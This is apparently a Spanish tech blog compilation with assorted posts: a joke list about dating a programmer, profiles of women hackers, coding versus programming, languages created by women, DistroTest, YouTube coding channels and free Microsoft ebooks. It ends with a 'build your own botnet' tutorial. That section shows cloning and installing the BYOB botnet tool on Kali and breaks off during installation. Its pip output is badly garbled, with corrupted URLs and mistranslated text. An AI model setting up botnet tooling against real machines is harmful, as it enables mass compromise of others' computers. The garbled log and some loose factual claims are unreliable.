15 Ventajas de tener un novio informático

1. Tienen unos dedos bastante habilidosos

via GIPHY

2. Aunque se quejen de que no están para arreglar computadores, el sólo estrés de ver que te demoras más de 3 segundos en encontrar la solución hará que te lo quite para arreglarlo él

via GIPHY

3. Siempre te tendrán actualizada en lo último que se está llevando en tecnología (aunque aún ni habías escuchado que existía)

via GIPHY

4. Comprarán compulsivamente la última consola que salga y siempre tendrá un segundo control para que jugues con él

via GIPHY

5. No tendrás que hacer sumas, multiplicaciones o cálculo alguno nunca más, él siempre tendrá el resultado de forma mental de forma inmediata

via GIPHY

6. No importa qué regalo quieras, siempre encontrarán alguien que lo importe desde algún pequeño país del Oriente gracias a su poder de búsqueda y compra por internet

via GIPHY

7. No te van a pedir que le expliques algo nunca, ellos lo saben casi todo

via GIPHY

8. Vas a tener quién le ayude a tu mamá cuando le salga un pop-up sospechoso o no sepa instalar la impresora y tú estés ocupada

via GIPHY

9. Son prácticos y no se complican por cosas sin importancia

via GIPHY

10. No importa lo que le muestres, siempre querrán inspeccionarte ( ͡° ͜ʖ ͡°)

via GIPHY

11. Te heredarán sus celulares o computadores cuando se compren uno nuevo

via GIPHY

12. Para ellos serás el gatito más lindo de todo el internet

via GIPHY

13. ¿Nadie entiende a las mujeres? B*tch please, ellos manejan Assembler

via GIPHY

14. Siempre estará disponible para ti las 24hrs del día, de alguna manera u otra

via GIPHY

15. Contigo tendrán la paciencia y delicadeza que no tendrán con nadie más

via GIPHY

😋 Las 10 mejores hackers mujeres del mundo

✍ Estas mujeres te enseñarán que este mundo no es solo para los hombres😋

🙉🙉 El el campo del hacking es muy grande y llega a mover trillones de dólares alrrededor del mundo. Después de todo, en la era de la tecnologia, los datos (y su seguridad) es lo más importante para la mayoría de las empresas y corporaciones. ✍Al escuchar la palabra ‘hacker’ muchas personas piensan en el estereotipo de un hombre con lentes, 🍄probablemente con poca higiene personal y quizás hasta gordo. Sin embargo, la realidad es muy diferente: además de que hay hombres normales que hackean, ¡también hay mujeres! Esta lista te mostrará cómo🍄  las mujeres también pueden ser parte del mundo del hacking.😋

Adeanna Cooke es una antigua conejita de Playboy que utilizó sus conocimientos como hacker para cuidar su integridad. Un día encontró un sitio de Internet😋 al cual su exnovio había subido fotos de ella desnuda —obviamente sin permiso—. La hacker se metió a la cuenta de su exnovio y borró las fotografías. Después del éxito, Cooke dedicó su tiempo a ayudar a chicas con problemas similares.

Xiao Tian

Esta hacker asiática es conocida por haber formado el “China Girl Security Team” después de darse cuenta de que las adolescentes como ella se encontraba en la minoría en un mundo dominado por hombres hackers. Hoy día, este grupo tiene😋 alianzas con algunas de las organizaciones de hacking más importantes del mundo.

Anna Chapman es una hacker rusa que parece que salió de una película de espías. Fue arrestada en 2010 en Estados Unidos acusada de ser un agente encubierto de la Federación Rusa. Se declaró culpable y fue extraditada a Rusia como moneda de cambio por prisioneros estadounidenses.

Kristina Svechinskaya

Kristina es probablemente una de las hackers más famosas del mundo. Era estudiante de la Universidad de Nueva York, y fue acusada de usar pasaportes falsos,😋 hacer fraude a diversos bancos y utilizar troyanos para robar dinero. Se cree que, en total, esta hacker ha robado $3 MDD.

Ying Cracker

Ying Cracker es conocida como una maestra del hackeo en Shanghai porque, además de ser excelente en lo que hace, Cracker ayuda a que otras personas aprendan😀 lo básico del hacking. La gente le paga para que les dé clases, las cuales van desde aprender a cambiar una IP hasta crackear software.

Gigabyte

😀 Gigabyte es popular por ser una de las hacker más agresivas del mundo. Se piensa que es la creadora de los peligrosos virus Coconut-A, Sahay-A y Sharp-A, los cuales no solo están diseñados para robar información privada, sino también para destruirla.

Joanna Rutkowska

😀 Joanna Rutkowska es una hacker de sombrero blanco, pues dedica su esfuerzo y trabajo a desarrollar software y herramientas para frenar a los hackers malos del mundo. Rutkowska se volvió popular al demostrar las vulnerabilidades de Windows Vista en 2006 y por fundar su startup de seguridad Invisible Things Labs.

Raven Adler

Raven Adler es quizá la hacker más significativa de la lista, pues fue la primera mujer en presentarse a la conferencia de hackers DefCon. Ahora, Adler trabaja desarrollando 😀software para detectar posibles hackeos y proteger la información de compañías. También es consultora y escribe artículos para revistas especializadas.

Jude Milhon😀

Jude Milhon ❤ fue una de las primeras hackers del mundo. Empezó su carrera en 1967, cuando se unió al grupo Cypherpunks. Después, formó parte del Computer Professionals for Social Responsibility. Durante su vida escribió diversos libros🤟 y artículos sobre el tema para convencer a toda una generación de que el hacking no forzosamente se utiliza para hacer el mal.

Natasha Grigori🤟

Natasha Grigori se volvió popular gracias a que fundó el sitio antichildporn.org ✍ en los 90. El sitio se convirtió más tarde en una organización que aún hoy es de las más fuertes e importantes en la lucha en contra de la distribución de pornografía infantil.🤟

¿Cuál es la diferencia entre codificación y programación?

El campo de la informática está cambiando rápidamente, en el que los términos se usan comúnmente de manera intercambiable y, a veces, se convierten en la norma. La afluencia de numerosos lenguajes de programación y sus aplicaciones contribuyen a la creciente confusión.

Es triste decir que incluso las personas técnicas no pueden determinar la diferencia entre estos significados. Algunos incluso se refieren a los dos términos como sinónimos. 😻😻

Algunos ejemplos incluyen la confusión de usar geeks y nerds, errores y excepciones, codificación y programación indistintamente… la lista continúa, aquí, no centraremos en la batalla de términos entre codificación y programación.
¿Son estos dos archirrivales? O simplemente parte de una estructura jerárquica de una organización.

Incluso los profesionales de informática se equivocan a la hora de describir la codificación y la programación de manera intercambiable. Por lo tanto, este artículo tiene el propósito de ayudar a definir ambos términos claramente.😃

¿Qué es la codificación?

En el mundo de la programación, la codificación ha arraigado profundamente su naturaleza. De hecho, es la alfabetización básica en la era digital. Entonces, comencemos preguntando “¿qué es la codificación informática?”😃
En general, la codificación informática es el proceso de escribir cientos de líneas de códigos en un lenguaje de programación. En una comprensión más técnica, es una introducción al desarrollo de software y es el trampolín hacia la profesión de programación. 
Principalmente, el objetivo básico de la codificación informática es traducir el lenguaje humano a un lenguaje que tanto las computadoras como las aplicaciones entiendan. En última instancia, los comandos están programados para procesar.

😃En una organización de desarrollo de software, el proceso de codificación se encuentra en la parte inferior de la estructura jerárquica. El enfoque del proceso es muy simple, ya que solo trata con un módulo específico de un producto de software. Y no se ocupa de los detalles de toda la aplicación.
Como solo se ocupa de escribir códigos, puede ser comparativamente más fácil que programar. Sin embargo, ten en cuenta que cada línea de código contribuye al bienestar general de la aplicación. 
Recuerda, traduce los requisitos, escribe ordenadamente líneas de códigos con ciertos términos y condiciones como: sintaxis correcta e implementa en formatos que las máquinas puedan leer. Por lo tanto, es un subconjunto de programación y se considera una técnica de programación importante.

¿Qué es la programación?

La programación es el proceso de analizar y conceptualizar sistemas utilizando uno o más lenguajes de programación. Incluye procesos tales como depuración, compilación, prueba e implementación de un producto de software.😊
La complejidad asociada con el proceso requiere fuertes habilidades analíticas. Por lo tanto, escribir aplicaciones complejas requiere un pensamiento de nivel superior en relación con las estructuras de datos, la arquitectura de la máquina y los algoritmos.
Al referirse a lo que hay detrás del proceso de programación, las complejidades están😊 presentes; pero el objetivo principal es simplemente tomar esas instrucciones y hacer que la máquina o las aplicaciones funcionen de la manera en que están diseñadas y programadas.
Dado que debe producir la salida correcta de la máquina en consecuencia, es, por lo tanto, es más exigente que la codificación. Ahora, la parte interesante es que la programación puede describirse como codificación junto con la resolución de problemas. ¿Suena fácil?
Bueno, la mayoría de las veces implica soluciones abstractas de mayor nivel de pensamiento. Los programadores predicen el resultado de los códigos una vez que se envían al repositorio, a diferencia del proceso de codificación. 
Implica un pensamiento proactivo sobre el resultado del código y lo resuelve antes de que ocurra. Sí, es el proceso de crear y desarrollar un programa de máquina ejecutable que realiza un conjunto de instrucciones. Sin embargo, dentro del proceso se encuentran soluciones a los problemas actuales, recurrentes y futuros que enfrenta el equipo de desarrollo.
¿Quiénes son estas personas detrás de la codificación y programación? En la siguiente sección, vamos a describir sus atributos y el alcance de sus trabajos.

Alcance del trabajo: codificadores vs programadores

😊 Es obvio que hay una diferencia entre codificadores y programadores. Sin embargo, las batallas entre codificadores y programadores pueden resumirse por el alcance del trabajo y las habilidades.
Un codificador informático utiliza un enfoque orientado a la sintaxis. Siguiendo las instrucciones dadas, los codificadores pueden transformar los requisitos en una línea específica de códigos. 
Al pasar por la escalera del desarrollo de software como profesión, todo comienza siendo un codificador. Por lo general, se consideran el personal menos capacitado y se asocia con uno o dos lenguajes de programación en la primera parte de su carrera.
Un programador, por otro lado, se mantiene en la cima de los codificadores en el ecosistema de desarrollo de software. Estos profesionales se ocupan de la escritura de códigos que satisfacen los requisitos tanto de las entradas humanas como de las máquinas. También son responsables de garantizar la sincronización de los requisitos y sus resultados deseados.
Al contrario de un codificador, los programadores implementan mejoras continuas siguiendo las tendencias actuales en el desarrollo de software. 
Los programadores ganaron una reputación exitosa en la industria a través del impulso bien mantenido al tratar con las funcionalidades centrales entre los códigos, las entradas humanas y las salidas deseadas de la aplicación.

Comparación de escenarios: codificadores vs programadores

La programación es crear un menú, la codificación es hacer una receta.
Además del tecnicismo, la diferencia entre estos dos se puede entender fácilmente en otro escenario. Por ejemplo;👍
A todo el mundo le encanta comer y a la mayoría de la gente le encanta cenar en un restaurante. Sabemos que un restaurante siempre ofrece un menú a sus clientes. Cada menú consta de diferentes tipos de recetas. Al crear un menú, hay muchos requisitos y factores a considerar. Principalmente, el tipo de cocina que desea vender.
La programación en el sentido real es similar a la creación de un menú
. La programación informática es como la naturaleza compleja de cómo incorporas tus aperitivos, platos principales, guarniciones y sus bebidas correspondientes.👍
Por otro lado, un menú no estará completo sin sus recetas. Y cada receta es como la codificación. El personal de un chef o restaurante necesita crear una receta y solo enfocarse en ella. No le importará lo que los demás están haciendo, siempre y cuando entregue su producción perfectamente, entonces su trabajo está hecho.
Sin embargo, desde una perspectiva mayor, cada receta debe ajustarse a todo el menú. Esto es nuevamente similar a la programación y la codificación. Todos los módulos del software deben asegurarse de que una vez integrados no afectarán a los otros módulos.
Además, la gestión de restaurantes y el desarrollo de software tienen análisis de requisitos desde el principio y pruebas de calidad y garantía en el camino. Por lo tanto, la comparación es bastante válida.

El camino corporativo de codificadores y programadores

La evolución constante de los productos y servicios de tecnologías de la información condujo a la gran demanda de profesionales cuya experiencia se enmarca en el campo del desarrollo de software. 
Si preguntamos, “¿qué les espera a los codificadores y programadores?” La respuesta es bastante obvia, los codificadores y programadores están aquí para quedarse.
Sin embargo, en el mundo real y en la experiencia personal, los codificadores ya no se llaman codificadores. Son algunos programadores junior o desarrolladores junior. Sin embargo, definitivamente todavía hay organizaciones que se refieren a los “codificadores” como deberían ser.

Realmente no hay nada malo en esto, ya que varía de una organización a otra. Además, algunas circunstancias, como la tradición y las normas, dificultan la adaptación y modificación. 
Una cosa es segura, el futuro de la codificación y la programación ofrece un gran potencial de crecimiento. Esto se debe especialmente a que un codificador puede ascender potencialmente en la escala corporativa para convertirse en programador.
Mientras que un programador puede avanzar y unirse al campo de los desarrolladores, ya que posee un nivel sofisticado de experiencia en codificación de software. 
En última instancia, él o ella puede convertirse en un ingeniero de software en el que se puede llevar a cabo la implementación y el diseño detallado diferente sobre los aspectos de una aplicación. Donde el arquitecto de software, por otro lado, se ocupa de las complejidades de la arquitectura del sistema.

Conclusión

Ahora que conoces la diferencia y con la intención de unirte al campo de desarrollo de software, un codificador es una buena manera de comenzar una posible carrera. Si eres un novato en el campo, comienza aprendiendo codificaciones.
Hay una gran variedad de tutoriales gratuitos y de pago disponibles en la Web. Intenta analizar las nuevas tendencias, como el lenguaje de secuencias de comandos y la programación en Python. 
Esto no es solo una batalla de términos, sino una excelente manera de establecer la diferencia y educar tanto a los técnicos como a los no técnicos.

5 😃 lenguajes de programación creados por mujeres

La contribución de las mujeres en el ámbito informático es más amplia de lo que muchos creen. Este día te presento 5 lenguajes de programación que fueron creados por mujeres😃

1. Grace Hopper – COBOL

La almirante de la Armada de los Estados Unidos, Grace Hopper (1906-1992) fue una de las primeras programadoras en la historia de la computadora. Su creencia 😎🙂 era que los lenguajes de programación deberían ser fáciles, comprensibles y simples, como el inglés; fue influyente en el desarrollo de uno de los primeros lenguajes de programación: COBOL.
Common Business-Oriented Language, comúnmente conocido como el lenguaje Cobol, es uno de los lenguajes de programación más antiguos. Este lenguaje se desarrolló en 1959 y pronto se aceptó en todo el mundo para tareas de programación de tipo empresarial (empresarial y financiero).😎

Cuando ella tenía siete años, Grace desarmó su despertador porque quería saber cómo funcionaba, pero no podía volver a armarlo. Mientras que su madre no entendía lo que la joven Grace había querido hacer, ella se dividió siete horas en casa. Esta curiosidad intelectual jugó un papel muy importante en la clasificación de Grace Hopper en las filas de las inventoras más famosas.😎🙂

 “Las personas son alérgicas al cambio. Les gusta decir: Siempre hemos trabajado de esta manera. Estoy tratando de combatirlo. Es por eso que tengo un reloj en la pared cuyas manos van en la dirección opuesta”. Grace Hopper.

2. Jean Sammet – FORMAC

Jean E. Sammet (1928 -) es una programadora retirada que es conocida por trabajar en FORMAC. FORTRAN fue desarrollado por IBM en los años 50, principalmente para computación matemática y computación científica. En 1961, IBM contrató 🤔a la matemática Jean Sammet, quien, junto con Grace Hopper, formó parte de un grupo desarrollado por COBOL. 
En 1962, Sammet desarrolló el lenguaje de programación FORMAC (FORmula MAnipulation Compiler), una continuación de FORTRAN, que pudo realizar manipulaciones algebraicas. FORMAC se ha convertido en el primer idioma en uso más amplio para cálculos matemáticos simbólicos. Sammet es la autora del libro “Programming Languages ​​- History and Fundamentals”, que se denominó “clásicos informáticos instantáneos” en 1969, cuando se publicó.


3. Cynthia Solomon – Logo

A finales de los años 60, un grupo de investigadores de Massachusetts vio la necesidad de un nuevo lenguaje de programación destinado a los niños, la base😻 de palabras y oraciones, y no números y símbolos, como en muchos lenguajes de programación hasta entonces. Uno de estas investigadoras fue Cynthia Solomon, quien comenzó su carrera en ciencias de la computación enseñando Lisp mientras trabajaba para el pionero de la inteligencia artificial Marvin Minsky.
Unos años más tarde participó en el desarrollo del nuevo lenguaje – Logo. Es un lenguaje de programación de alto nivel que se basa en un modo de programación funcional. Fue creado a partir del lenguaje de programación Lisp. 
El componente del lenguaje de Logo es turtle graphics, un sistema gráfico que es fácil de aprender, así como todo el lenguaje. Este lenguaje fue creado con el objetivo de ser una herramienta educativa, y no solo en la programación.
Originalmente, no tenía capacidades gráficas, por lo que estaba conectado al dispositivo, una especie de robot, que se llamaba tortuga. La tortuga estaba conectada a una computadora y se😻 manejaba con el comando del lenguaje logo. Ella podría moverse horizontalmente hacia adelante y hacia atrás y cambiar la la dirección del movimiento. Si se colocara una hoja de papel debajo de la tortuga, ella podría dejar un rastro en ella, formando un gráfico llamado “gráficos de tortuga”.

4. Barbara Liskov – CLU

Barbara 😮 Liskov es la primera mujer en los Estados Unidos en obtener un doctorado en ciencias de la computación. Dirigió un grupo de científicos que diseñaron y desarrollaron el barbarian liskovCLU, un lenguaje de programación, que fue un paso evolutivo importante en el desarrollo de los lenguajes de programación.
Fue creado a mediados de los años setenta. A través de la CLU, Liskova introdujo (y popularizó) conceptos tales como tipos de datos abstractos, iteradores y tareas paralelas. Liskova recibió el Premio Turing 2008 por su trabajo en la creación de lenguajes de programación y metodología de software que condujo al desarrollo de la programación orientada a objetos.
Ella desarrolló dos lenguajes de programación – CLU y Argus (1980). Hoy es profesora de ingeniería en el Instituto de Tecnología de Massachusetts, en el Departamento de Ingeniería Eléctrica e Informática. Es autora de tres libros y más de cien artículos profesionales.

5. Adele Goldberg – Smalltalk

Como COBOL se desarrolló 20 años antes para facilitar la programación a todas las personas, una de las ideas básicas detrás de la historia de Smalltalk es crear un lenguaje que permita a todos, y no solo a los desarrolladores, crear aplicaciones.
En 1973, Adele Goldberg se unió al equipo de Smalltalk y desempeñó un papel muy importante en el desarrollo del lenguaje en sí, así como en sus conceptos pioneros, como el controlador de vista de modelo, el editor WYSIWYG y un entorno de desarrollo integrado.
Smalltalk es un lenguaje de programación reflexivo, orientado a objetos. La combinación de Smalltalk y C representa Objective-C, un lenguaje de programación utilizado en Apple para los sistemas operativos OS X e iOS y sus interfaces de programación de aplicaciones.😮
¿Te ha sido útil el post? Por favor compártelo en las redes sociales.

😍 Cómo probar las más de 200 distribuciones de Linux sin tener que descargarlas

Existen algunas fantásticas herramientas que ayudan a las personas a descubrir la distribución de Linux ideal que se adapta a sus necesidades y expectativas, pero una nueva herramienta que acabo de encontrar francamente me sorprende.

Acabo de probar Debian 9.9.0 Cinnamon, MX Linux 18.3 y Peppermint OS de manera rápida. Pero lo hice sin descargar ningún ISO, sin flashear ninguna imagen a un USB, y sin siquiera encender VirtualBox. Eso es gracias a DistroTest.net, un sitio web que transmite la experiencia directamente a tu navegador.

DistroTest es una creación de Forster Tobias y Andy Klemann. Opera según la filosofía de cada usuario potencial de Linux que hace las preguntas de “3 Q”:

  • ¿Qué distribución es la mejor para mí?
  • ¿Qué interfaz gráfica quiero?
  • ¿Qué opciones de configuración tengo?

¿Cuántas distros puedo testear?

DistroTest ofrece increíblemente 689 versiones en 223 sistemas operativos únicos. Esto se siente como una empresa gigantesca para los operadores del sitio, pero la experiencia del usuario final es impecable y sencilla.

Básicamente, navegas o buscas la distribución de Linux que deseas probar (también puedes filtrar el sitio por las versiones más recientes) y luego has clic en Iniciar.

El equivalente de iniciar una distro live CD o la imagen del instalador y esta se transmite a tu navegador en una ventana separada a través de NoVNC, pero también puedes conectarte al sistema en un cliente VNC instalado localmente: la dirección IP y el puerto del servidor se proporcionan después de comenzar tu sesión.
Descubrí que solo necesitabas esperar unos segundos para que se cargara cada distribución, y ocasionalmente puedes ingresar una cola para administrar la carga de ancho de banda del lado del servidor.
Luego tendrás un total de dos horas para tratar la distro como si fuera tuya. Agrega o elimina software, modifica los archivos de configuración, particiona y formatea los discos duros, lo que desees. Una vez que lo apagas, el sistema se limpia.
Es obvio que obtendrás una experiencia más rápida y agradable ejecutándolas en tu propio hardware, o incluso desde el software para Máquinas Virtuales instalado en tu sistema, pero las primeras impresiones lo son todo, ¡DistroTest es una manera brillante de obtener esa primera impresión sobre que distro elegir!
Nota: Debido al aumento de tráfico que ha tenido el sitio, en algunas ocasiones puede no funcionar, el fundador asegura que están trabajando para evitar estas fallas.

10 😍 CANALES DE YOUTUBE PARA PROGRAMAR GRATIS

La programación se ha convertido en un imprescindible para muchas personas, muchas de las tareas y profesiones que podemos encontrar a dí­a de hoy exigen lo mí­nimo de programación. A muchos se nos viene el mundo encima cuando únicamente oí­mos esa palabra. Pero actualmente, ha dejado de ser un trabajo complicada, y esto, gracias a Internet.

A dí­a de hoy, Youtube es una de las mejores formas de aprender. Cantidad de usuarios comparten sus conocimientos a través de los distintos medios que podemos encontrar en la red, y Youtube es sin duda una de las mejores opciones para esto, gracias a los ví­deos, podemos entender todo de una forma mucho más clara.

Son muchos los canales de YouTube que ofrecen ví­deo tutoriales sobre programación, nosotros, hemos escogido los diez más completos, fáciles de entender, y en español.

1 – Codigofacilito

Este es posiblemente el mejor canal de Youtube en español para aprender a programar, cuenta con más de trescientos mil suscriptores y más de 42 millones de visualizaciones, y el contenido es de muy buena calidad. Incluye listas de reproducciones con distintos cursos, programación de Android, WordPress, PHP, Java y CC+ entre otros. Todos ellos con introducciones y separados por temas.

2 – Empieza a programar

Este canal es muy buena opción si quieres empezar a programar. No cuenta con tantos cursos como el primero, pero sí­ lo necesario para empezar y sobretodo, entender del tema. Cuenta con más de 3 millones de visualizaciones y gran cantidad de comentarios positivos. Tiene cursos de distintas dificultades separados por temas, además ví­deos sobre opinión personal sobre la programación.

3 – Latincoder

Latincoder es otro de los muchos canales de tutoriales sobre programación, cuenta con noventa mil suscriptores y más de siete millones de visualizaciones. En su canal incluye listas de reproducción con tutoriales de distintos niveles sobre Java, Linux, Android etc. Además de ví­deos de opiniones personales y experiencias.

4 – Pildorasinformaticas

Este canal de YouTube cuenta con más de 25 millones de visualizaciones. Tiene una gran cantidad de ví­deos de buena calidad sobre programación, con cursos de HTML 5,Java, Android, e incluso, plataformas como Excel, Word y PowePoint.

5 – Deividcoptero

El Canal Deividcoptero cuenta con más de 70 mil suscriptores y más de siete millones de visualizaciones. Este canal se dedica principalmente a los tutoriales de programación para juegos es cc+, pero podemos encontrar cursos de JavaScript, SQL Server entre otros.

6 – DesarrolloWeb.com

El canal de Youtube Desarolloweb trata sobre todo de la programación en webs. Pero también podemos encontrar distintos tutoriales de desarrollo de aplicaciones entre otros. Cuenta con más de seis millones de visualizaciones y más de ochenta mil suscriptores. Lo que más destaca de este canal son los ví­deos explicativos, son de muy buena calidad, con explicaciones claras y fáciles de entender.

7 – Jesús Conde

Este canal es uno de los más completos para aprender programación, con 153 mil suscriptores y más de 17 millones de visualizaciones, tiene una gran variedad de cursos sobre este tema, incluyendo ví­deos para principiantes e incluso, para niños. Los ví­deos son de muy buena calidad y tiene muchos comentarios positivos.

8 – Jotajotavm

Otro canal de Youtube perfecto para aprender programación y algo más. Cuenta con una gran cantidad de cursos de programación de aplicaciones móviles, diseño web, programación de juegos, Java etc. Además de algunos ví­deos de consejos y opiniones sobre este tema.

9 – Programación ATS

Programación ATS es un canal que se centra principalmente en los tutoriales de programación C++, sus ví­deos son muy completos, prácticos, y fáciles de entender. También tiene ví­deos de opinión e interés muy interesantes.

10 – Tutoriales y más

Tutoriales y más tiene un gran contenido para aprender programación. Distintos cursos de Java, CSS3, HTML 5 para principiantes etc. Además, tiene distinto contenido, como tutoriales sobre Excel, análisis de programas y trucos y consejos entre otros. Una buena opción si buscas un canal para iniciarte en el mundo de la programación y algo más.

Microsoft regala cientos de libros, tutoriales y guías de informática en su web

Si eres un apasionado de la informática y buscas algo que leer durante las vacaciones de verano, Microsoft tiene buenas noticias para ti. La compañía acaba de subir cientos de libros, guías y manuales a su página web, y puedes descargarlos totalmente gratis.

De esta manera, podrás descargarlos y leerlos cómodamente en tu Kindle, tablet, smartphone o computadora. Son 300 libros, y están en formato PDF, ePub y Mobi. Esto nos posibilita hacer búsquedas y poder consultarlos cómodamente.

Los han dividido por temáticas: Microsoft Office (2013, 2016 y 365), Windows 10 y Windows Server, Azure, Powershell, etc. Todos están en inglés, pero seguro que la mayoría de las personas interesadas en estos temas tendrán los conocimientos suficientes para entenderlos.

Cientos de libros en y manuales. Gratis y en diferentes formatos.

Crea tu propia Botnet (TUTORIAL PASO A PASO)

Según los consultores de hacking ético, el malware ha existido en los mundos de Internet desde hace muchos años. Cuanto más nueva tecnología llega, más malware se propaga a través de Internet. Hoy vamos a hablar de botnet. La botnet es creada por un malware infectado, luego de lo cual el bot circula a través de una red. En el escenario de infectar ordenadores grandes se usa botnet. Debido a que botnet otorga privilegios para infectar a un gran grupo de computadoras, los maestros de hacking ético advierten. Las botnets se están convirtiendo en una gran parte de la seguridad cibernética. La mayoría de las empresas son objetivo utilizando botnets. La palabra botnet evoluciona de robot de red y red donde el robot está infectado por malware y luego se convierte en parte de cualquier red.

Según un investigador de hacking ético del International Institute of Cyber ​​Security, los bots se encontraban en las últimas noticias por atacar al sector financiero en Estados Unidos.

BYOB (Construye tu propia red de bots) es un código de Python de pocas líneas donde puedes crear tu propia red de bots usando algunos comandos simples. Este proyecto fue implementado para investigadores y desarrolladores de seguridad. Esta herramienta está diseñada para implementar algunas de sus propias características según el requisito. Para mostrarle que esta herramienta ha sido probada en Kali Linux 2018.3 como atacante, y construiremos un servidor BYOB en el mismo Linux Kali.

Para el tipo de clonación https://github.com/malwaredllc/byob.git

root @ kali: / home / iicybersecurity / Downloads # git clone https://github.com/malwaredllc/byob.git
 Clonación en 'byob' ... 
remoto: Enumerando objetos: 53, listo. 
remoto: contando objetos: 100% (53/53), hecho. 
remoto: Compresión de objetos: 100% (33/33), hecho. 
remoto: Total 1989 (delta 28), reutilizado 38 (delta 20), paquete reutilizado 1936 
Objetos de recepción: 100% (1989/1989), 1,37 MiB | 1.45 MiB / s, hecho. 
Resolución de deltas: 100% (1344/1344), hecho.
  • Entonces escribe cd byob
  • Escriba pip install -r Requirements.txt
root @ kali: / home / iicybersecurity / Downloads / byob / byob # pip install -r
 Requirements.txt Ignorando pyHook: markers 'sys_platform == "win32"' no coincide con su entorno 
Ignorando pypiwin32: markers 'sys_platform == "win32 "'no coincide con su entorno 
Recopilación de mss == 3.3.0 (de -r Requirements.txt (línea 1)) 
   Descargando https://files.pythonhosted.org/packages/d1/bc/1965b94c015666f0dce53248e219802137cfe3927109843706d7c4c48f78/os.jpg 0-py2.py3-none-any.whl 
Recopilación de WMI == 1.4.9 (de -r Requirements.txt (línea 2)) 
   Descargando https://files.pythonhosted.org/packages/03/2d/cbf13257c011vfccccccccccccccccccccccccccc07407c0115cccccccccccccccc034084cc70c540405cbd0cc02cccccccccccccccccccccccccccc03408411cec70c565405cbd01307cccccccccccccccccccccc07407c0115ccccccccccccc074074c074074003 -1.4.9.zip 
Recopilación de números == 1.15.2 (de -r Requirements.txt (línea 3))
   La descarga de https://files.pythonhosted.org/packages/a4/49/f454aa408e6b82d9fb95669f181415db915dadb27127ee475eccf1eecddd/numpy-1.15.2-cp27-cp27mu-manylinux1_i686.whl (10.1MB) 
     100% | ███████████ █████████████████████ | 10.1MB 2.1kB / s 
Recopilación de pyxhook == 1.0.0 (de -r Requirements.txt (línea 4)) 
   Descargando https://files.pythonhosted.org/packages/70/d1/8f56e13b002502ad85975f2dcebb5d1026551e34cafc77a13b002502adv.jpg tar.gz 
Recopilación de twilio == 6.14.0 (de -r Requirements.txt (línea 5)) 
   Descargando https://files.pythonhosted.org/packages/4c/b5/f341339851a53a76dd476979pppp. -none-any.whl (821kB) 
     100% | ████████████████████████████████ | 829kB 482kB / s
Recolección de colorama == 0.3.9 (de -r Requirements.txt (línea 6)) 
   Descargando https://files.pythonhosted.org/packages/db/c8/7dcf9dbcb22429512708fe3a547f8b6101c0d02137aciquina92505aee57adocompas.com any.whl 
Requisito ya cumplido: solicitudes == 2.20.0 en /usr/local/lib/python2.7/dist-packages/requests-2.20.0-py2.7.egg (de -r Requirements.txt (línea 7 )) (2.20.0) 
Recopilación de PyInstaller == 3.3.1 (de -r Requirements.txt (línea 8)) 
   Descargando https://files.pythonhosted.org/packages/3c/86/909a8c35c5471919b3854c01f43843d9b5aed0e9948b63pc.p.p.p.p.p.p.p.p.p.c.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.cf) .tar.gz (3.5MB) 
     100% | ████████████████████████████████ | 3.5MB 111kB / s 
Recopilando opencv-python == 3.4.3.18 (de -r Requirements.txt (línea 9))
   Descargando https://files.pythonhosted.org/packages/6c/03/3f11eec70d964cf28afb37c7778e1acbb8632afd78b288dd9fe74080c712ux1peapacioplanque de las partes de las 
     personas. █████████████████████ | 24.9MB 2.3kB / s 
Recopilación de python-xlib (de pyxhook == 1.0.0 -> - r Requirements.txt (línea 4)) 
   Descargando https://files.pythonhosted.org/packages/54 / ctgggggggggggggggggggggggggggggggg2303e635e635d6333e635d6333e635d6333e635d633d6333e635d633d6333e635d633d63386008 -0.23-py2.py3-none-any.whl (123kB) 
     100% | | 133kB 1.7MB / s 
Requisito ya cumplido: seis en /usr/lib/python2.7/dist-packages (desde twilio == 6.14.0 -> - r Requirements.txt (línea 5)) (1.11.0)
Requisito ya cumplido: pytz en /usr/lib/python2.7/dist-packages (de twilio == 6.14.0 -> - r Requirements.txt (línea 5)) (2018.5) 
Requisito ya cumplido: PyJWT> = 1.4. 2 en /usr/lib/python2.7/dist-packages (de twilio == 6.14.0 -> - r Requirements.txt (línea 5)) (1.6.4) 
Requisito ya cumplido: certifi> = 2017.4.17 in /usr/lib/python2.7/dist-packages (de solicitudes == 2.20.0 -> - r Requirements.txt (línea 7)) (2018.4.16) 
Requisito ya cumplido: chardet <3.1.0,> = 3.0 .2 en /usr/lib/python2.7/dist-packages (de peticiones == 2.20.0 -> - r Requirements.txt (línea 7)) (3.0.4) 
Requisito ya cumplido: idna <2.8,> = 2.5 en /usr/lib/python2.7/dist-packages (de solicitudes == 2.20.0 -> - r Requirements.txt (línea 7)) (2.6)
Requisito ya cumplido: urllib3 <1.25,> = 1.21.1 en /usr/lib/python2.7/dist-packages (de solicitudes == 2.20.0 -> - r Requirements.txt (línea 7)) (1.22) 
Recopilación dis3 (de PyInstaller == 3.3.1 -> - r Requirements.txt (línea 8)) 
   Descargando https://files.pythonhosted.org/packages/9c/5c/4a4a2802f10f558018413990a58fd3dd7ed1eb48e6de7266334c2489b2489bik89b98999.pcn.pdf any.whl 
Recolectando macholib> = 1.8 (de PyInstaller == 3.3.1 -> - r Requirements.txt (línea 8)) 
   Descargando https://files.pythonhosted.org/packages/41/f1/6d23e08ascasas de las costillas -py2.py3-none-any.whl 
Requisito ya cumplido: pefile> = 2017.8.1 en /usr/lib/python2.7/dist-packages (de PyInstaller == 3.3.1 -> - r Requirements.txt (línea 8)) (2017.11.5)
Requisito ya cumplido: setuptools en /usr/lib/python2.7/dist-packages (de PyInstaller == 3.3.1 -> - r Requirements.txt (línea 8)) (39.2.0) 
Recopilación de altgraph> = 0.15 (de macholib> = 1.8-> PyInstaller == 3.3.1 -> - r Requirements.txt (línea 8)) 
   Descargando https://files.pythonhosted.org/packages/0a/cc/646187eac4b797069epepía de las partes de los casos de las personas. .py3-ninguno-any.whl 
ruedas de construcción para paquetes recogidos: WMI, pyxhook, PyInstaller 
   Correr bdist_wheel setup.py para WMI ... hace 
   almacenados en el directorio: /root/.cache/pip/wheels/f3/c8/24/dc2368d129e5b249d163cbe365b993ad89ae6bb2371008a129 
   de reproducción setup.py bdist_wheel para pyxhook ... hecho
   Almacenado en el directorio: /root/.cache/pip/wheels/50/45/1b/855ffad848a142c0a7076635f437b54b20afc96588495905a1 
   Correr bdist_wheel setup.py para PyInstaller ... hecho 
